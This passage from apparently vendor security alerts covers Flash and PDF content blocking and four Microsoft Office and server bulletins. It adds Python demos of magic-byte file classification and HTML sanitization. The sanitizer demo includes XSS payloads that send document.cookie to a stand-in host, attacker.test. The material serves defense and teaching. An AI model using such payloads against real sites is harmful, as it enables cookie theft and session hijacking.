  • .f4a – Flash audio file
  • .f4b – Flash audiobook file
  • .pdf – Adobe Reader document

MIME types:

  • application/x-shockwave-flash (compiled Flash, .swf)
  • video/x-flv
  • video/mp4 (used for more than just Flash)
  • audio/mp4 (used for more than just Flash)
  • application/pdf
  • application/x-pdf
  • application/acrobat
  • applications/vnd.pdf
  • text/pdf
  • text/x-pdf

FILExt.com reported Magic Byte Pattern:

  • FLV Hex: 46 4C 56 01
  • FLV ASCII: FLV
  • FLA Hex: D0 CF 11 E0 A1 B1 1A E1 00
  • PDF Hex: 25 50 44 46 2D 31 2E
  • PDF ASCII: %PDF-1.

(Keep in mind, not all of the hex and ASCII patterns shared here are appropriate for content blocking. If a pattern is too short or not unique enough, blocking on it will produce false positives. The three-byte FLV ASCII string is short enough to appear by chance in unrelated content, and the FLA pattern is the generic OLE2 compound-document header that legacy Word, Excel and PowerPoint files also carry, so blocking on it would block those documents as well.)

If you decide you want to block these files, the links below contain instructions that will help you configure your Firebox proxy’s content blocking features using the file and MIME information listed above.
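To make the three identification methods concrete, here is an added example, not part of the original alert and not WatchGuard proxy code, that applies the same extension, MIME-type and magic-byte checks to a few constructed HTTP responses. It goes slightly beyond the lists above: it adds the compiled .swf format (magic bytes FWS, CWS or ZWS, MIME type application/x-shockwave-flash), which is what web pages actually embed, and it treats the FLA pattern as unreliable on its own because it is the generic OLE2 compound-document header. The example.test URLs and the response bodies are made up for the demonstration.

```python
import os
from urllib.parse import urlparse

# Extensions and MIME types from the alert's lists, plus .swf and
# application/x-shockwave-flash for compiled Flash (an addition to the lists).
FLASH_EXTS = {".swf", ".flv", ".fla", ".f4v", ".f4p", ".f4a", ".f4b"}
PDF_EXTS = {".pdf"}
FLASH_MIMES = {"application/x-shockwave-flash", "video/x-flv"}
AMBIGUOUS_MIMES = {"video/mp4", "audio/mp4"}   # used for far more than Flash
PDF_MIMES = {"application/pdf", "application/x-pdf", "application/acrobat",
             "applications/vnd.pdf", "text/pdf", "text/x-pdf"}

# Magic-byte signatures: (kind, prefix, reliable, note).  "reliable" means the
# prefix is long and specific enough to block on by itself.
MAGIC = [
    ("flash", b"FWS", True, "uncompressed SWF"),
    ("flash", b"CWS", True, "zlib-compressed SWF"),
    ("flash", b"ZWS", True, "LZMA-compressed SWF"),
    ("flash", b"FLV\x01", True, "FLV header with version byte"),
    ("pdf", b"%PDF-1.", True, "PDF header"),
    # The FLA pattern is the generic OLE2 compound-document header that legacy
    # .doc/.xls/.ppt/.msi files share, so it cannot identify Flash on its own.
    ("flash", b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1", False,
     "OLE2 header (FLA and much else)"),
]


def classify(url, content_type, body):
    """Evaluate one HTTP response the way a file-blocking proxy rule would:
    by extension, by declared MIME type and by the first bytes of the body.
    Returns the individual signals plus a block/allow verdict."""
    ext = os.path.splitext(urlparse(url).path)[1].lower()
    mime = content_type.split(";")[0].strip().lower()
    result = {"ext": None, "mime": None, "magic": None,
              "magic_reliable": False, "note": None}

    if ext in FLASH_EXTS:
        result["ext"] = "flash"
    elif ext in PDF_EXTS:
        result["ext"] = "pdf"

    if mime in FLASH_MIMES:
        result["mime"] = "flash"
    elif mime in PDF_MIMES:
        result["mime"] = "pdf"
    elif mime in AMBIGUOUS_MIMES:
        result["mime"] = "ambiguous"

    for kind, prefix, reliable, note in MAGIC:
        if body.startswith(prefix):
            result["magic"], result["magic_reliable"], result["note"] = kind, reliable, note
            break

    # Block on a reliable magic match regardless of what the headers claim
    # (renamed files and lying Content-Type headers are the usual evasion), or
    # on an unambiguous extension / MIME match.  An unreliable magic match by
    # itself is not enough: that is the false-positive trap the alert warns about.
    if result["magic"] and result["magic_reliable"]:
        result["verdict"], result["reason"] = "block", "magic"
    elif result["ext"] in ("flash", "pdf") or result["mime"] in ("flash", "pdf"):
        result["verdict"], result["reason"] = "block", "ext/mime"
    else:
        result["verdict"], result["reason"] = "allow", "no reliable signal"
    return result


# Constructed sample responses (not real captures): a normal SWF, a PDF
# disguised as a JPEG, an ordinary Word document, and an ordinary MP4 clip.
SAMPLES = [
    ("http://example.test/ad.swf", "application/x-shockwave-flash",
     b"CWS\x0a\x90\x01\x00\x00x\x9c"),
    ("http://example.test/photo.jpg", "image/jpeg",
     b"%PDF-1.5\n%\xe2\xe3\xcf\xd3\n1 0 obj"),
    ("http://example.test/memo.doc", "application/msword",
     b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1\x00\x00\x00\x00"),
    ("http://example.test/clip.mp4", "video/mp4",
     b"\x00\x00\x00\x18ftypmp42"),
]

if __name__ == "__main__":
    for url, ctype, body in SAMPLES:
        r = classify(url, ctype, body)
        print(f"{url:32} {r['verdict']:5} ({r['reason']})  ext={r['ext']} "
              f"mime={r['mime']} magic={r['magic']} reliable={r['magic_reliable']}")
```

The disguised PDF is caught only by the magic-byte check, which is why extension and MIME rules alone are easy to evade; the Word document carries the same OLE2 header the FLA pattern matches, which is why that pattern must not be used as a blocking rule on its own.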

Status:

Adobe has released updates to fix these Flash vulnerabilities, however, they have not yet responded to the Reader X zero day.

References:

This alert was researched and written by Corey Nachreiner, CISSP (@SecAdept)

Four Updates Repair Office and Server Software Vulnerabilities

Severity: High

Summary:

  • These vulnerabilities affect: Microsoft Office related products, including Word, Works, SharePoint, InfoPath, Communicator, Lync, Groove, and more
  • How an attacker exploits them: Multiple vectors of attack, including enticing users to click specially crafted links, or to open specially crafted documents
  • Impact: In the worst case, an attacker can gain complete control of your Windows computer
  • What to do: Install the appropriate Microsoft patches as soon as possible, or let Windows Automatic Update do it for you.

Exposure:

Today, Microsoft released four security bulletins that fix around 20 vulnerabilities in a wide range of Microsoft Office and Server Software products. The affected products include:

  • Word and Word Viewer
  • Works 9
  • SharePoint Server
  • InfoPath
  • Communicator and the new Lync
  • Groove
  • FAST Search Server
  • and the Office Web Apps

I summarize these four security bulletins below, in order from highest to lowest severity.

  • MS12-064: Two Word Memory Corruption Vulnerabilities

Word is the popular word processor that ships with Office. It suffers from two memory corruption vulnerabilities having to do with how it handles maliciously crafted Word or RTF documents. By enticing one of your users to download and open a specially crafted document, an attacker could leverage either of these flaws to execute code on that user’s computer, with that user’s privileges. If you grant users local administrator privileges, the attacker could leverage these vulnerabilities to gain complete control of their machines. These flaws affect all current versions of Word, including Word Viewer, the Office Compatibility Pack, and the Office Web Apps.

Microsoft rating: Critical

  • MS12-065: Works 9 Heap Buffer Overflow Vulnerability

Works is a lightweight word processor, less expensive than Word but lacking many of its features. It suffers from a heap buffer overflow vulnerability having to do with how it handles malformed Word documents. By luring one of your users into downloading and opening a malicious Word document, an attacker can exploit this buffer overflow to execute code on that user’s computer, with that user’s privileges. Again, if your users have local administrator privileges, the attacker gains complete control of their PCs. The flaw only affects Works 9.

Microsoft rating: Important

  • MS12-066: Microsoft Server Software XSS Vulnerability

Many of Microsoft’s Server Software products (including SharePoint Server, Communicator and Lync, InfoPath, and Groove) suffer from a Cross-site Scripting (XSS) vulnerability caused by their failure to properly sanitize HTML input. The bulletin doesn’t say exactly which component of these web-based servers is affected, only that they are. In any case, if an attacker can trick you into clicking a specially crafted link, he could leverage this flaw to steal your web cookie, hijack your web session, or take essentially any action you could on the vulnerable server. In some cases, attackers chain XSS with browser exploits to hijack your web browser and gain unauthorized access to your computer.

Microsoft rating: Important
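The bulletin gives no detail on where the sanitization fails, so the following is an added, generic illustration of the flaw class rather than Microsoft’s component or any exploit for it: a denylist sanitizer that only strips script blocks, beside an allowlist sanitizer built on Python’s html.parser, both run against constructed payloads of the cookie-stealing kind described above. The attacker.test host and the payloads are invented for the demonstration.

```python
import html
import re
from html.parser import HTMLParser

# Denylist sanitizer: strips <script>...</script> and nothing else.  This is
# the shape of "HTML sanitization" XSS bugs usually hide in, because HTML has
# many other ways to run script (inline event handlers, javascript: URLs, ...).
SCRIPT_RE = re.compile(r"<script\b.*?</script\s*>", re.IGNORECASE | re.DOTALL)


def denylist_sanitize(markup):
    return SCRIPT_RE.sub("", markup)


# Allowlist sanitizer: rebuild the fragment keeping only known-safe tags and
# attributes, and escape all text.  Anything not explicitly allowed is dropped.
ALLOWED_TAGS = {"b", "i", "em", "strong", "p", "br", "ul", "ol", "li", "a"}
ALLOWED_ATTRS = {"a": {"href"}}
SAFE_SCHEMES = ("http://", "https://")


class AllowlistSanitizer(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []

    def handle_starttag(self, tag, attrs):
        if tag not in ALLOWED_TAGS:
            return                            # drops <img>, <svg>, <script>, ...
        kept = []
        for name, value in attrs:
            if name not in ALLOWED_ATTRS.get(tag, set()):
                continue                      # drops onerror=, onclick=, style=
            value = (value or "").strip()
            if name == "href" and not value.lower().startswith(SAFE_SCHEMES):
                continue                      # drops javascript:, data:, vbscript:
            kept.append(f' {name}="{html.escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_startendtag(self, tag, attrs):
        self.handle_starttag(tag, attrs)

    def handle_endtag(self, tag):
        if tag in ALLOWED_TAGS:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        self.out.append(html.escape(data, quote=False))


def allowlist_sanitize(markup):
    parser = AllowlistSanitizer()
    parser.feed(markup)
    parser.close()
    return "".join(parser.out)


def contains_script(markup):
    """Rough detector used only to score the demo: a script tag, an inline
    event handler attribute or a javascript: URL surviving in the output."""
    m = markup.lower()
    return ("<script" in m or "javascript:" in m
            or re.search(r"<[^>]*\son\w+\s*=", m) is not None)


# Constructed payloads of the kind the alert describes (cookie theft when the
# victim follows a crafted link); attacker.test is a placeholder host.
PAYLOADS = [
    '<script>document.location="http://attacker.test/?c="+document.cookie</script>',
    '<img src=x onerror="fetch(\'http://attacker.test/?c=\'+document.cookie)">',
    '<a href="javascript:alert(document.cookie)">click me</a>',
    '<ScRiPt>alert(document.cookie)</ScRiPt >',
]


def audit(payloads):
    """Return (denylist_leaks, allowlist_leaks): how many payloads each
    sanitizer still lets through."""
    deny = sum(contains_script(denylist_sanitize(p)) for p in payloads)
    allow = sum(contains_script(allowlist_sanitize(p)) for p in payloads)
    return deny, allow


if __name__ == "__main__":
    for p in PAYLOADS:
        print("denylist :", denylist_sanitize(p))
        print("allowlist:", allowlist_sanitize(p))
    print("leaks (denylist, allowlist):", audit(PAYLOADS))
```

The denylist catches the obvious script tags, including the mixed-case variant, but passes the event-handler and javascript: URL payloads untouched; the allowlist passes none of them, because it never asks "is this dangerous?" and only ever asks "is this on the list?".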

  • MS12-067: FAST Search Server Oracle Outside In Vulnerabilities

Microsoft’s FAST Search Server improves the searchability of your SharePoint infrastructure. In previous alerts and videos, we warned you that Microsoft Exchange leveraged Oracle’s Outside In technology to parse various types of file attachments, and that Outside In suffered from a number of remote code execution vulnerabilities. FAST Search Server also implements Outside In, and suffers from the same vulnerabilities. If an attacker can upload a specially crafted file to a share that FAST Search Server indexes, he could leverage these vulnerabilities to execute arbitrary code on the FAST Search Server. However, two factors significantly mitigate the severity of these issues. First, most administrators only use this server to index internal file shares, which means the attacker needs local access and privileges to upload the malicious file. Second, the attacker could only execute code with the limited privileges of a “user account with a restricted token.”

Microsoft rating: Important

Solution Path:

Microsoft has released Office and Server Software patches that correct all of these vulnerabilities. You should download, test, and deploy the appropriate Windows patches throughout your network immediately. If you choose, you can also let Windows Update automatically download and install these updates for you. That said, we highly recommend you test server updates before deploying them, so you may not want to turn on automatic updates for your servers.

The links below point directly to the “Affected and Non-Affected Software” section of each bulletin, where you can find all of Microsoft’s update links:

For All WatchGuard Users:

Our XTM security appliances can mitigate the risk of many of these flaws. One of our generic XSS detection signatures already detects and prevents the XSS flaw described in MS12-066. Furthermore, with information from Microsoft’s Active Protections Program (MAPP), we have already developed a signature for the RTF exploit described in MS12-064, which we will include in a new signature set your appliance should get shortly.

Furthermore, WatchGuard’s Gateway Antivirus (GAV) service detects most of the common malware attackers try to deliver when exploiting these flaws. In short, if you have our UTM bundle and enable IPS and GAV, we can protect you from many attacks that try to leverage these flaws.

Nonetheless, attackers can exploit these flaws in other ways as well, including uploading malicious files locally. We still recommend you install Microsoft’s updates as quickly as possible to completely protect yourself from these flaws.

Status:

Microsoft has released patches correcting these issues.

References:

This alert was researched and written by Corey Nachreiner, CISSP (@SecAdept).


What did you think of this alert? Let us know at your.opinion.matters@watchguard.com.
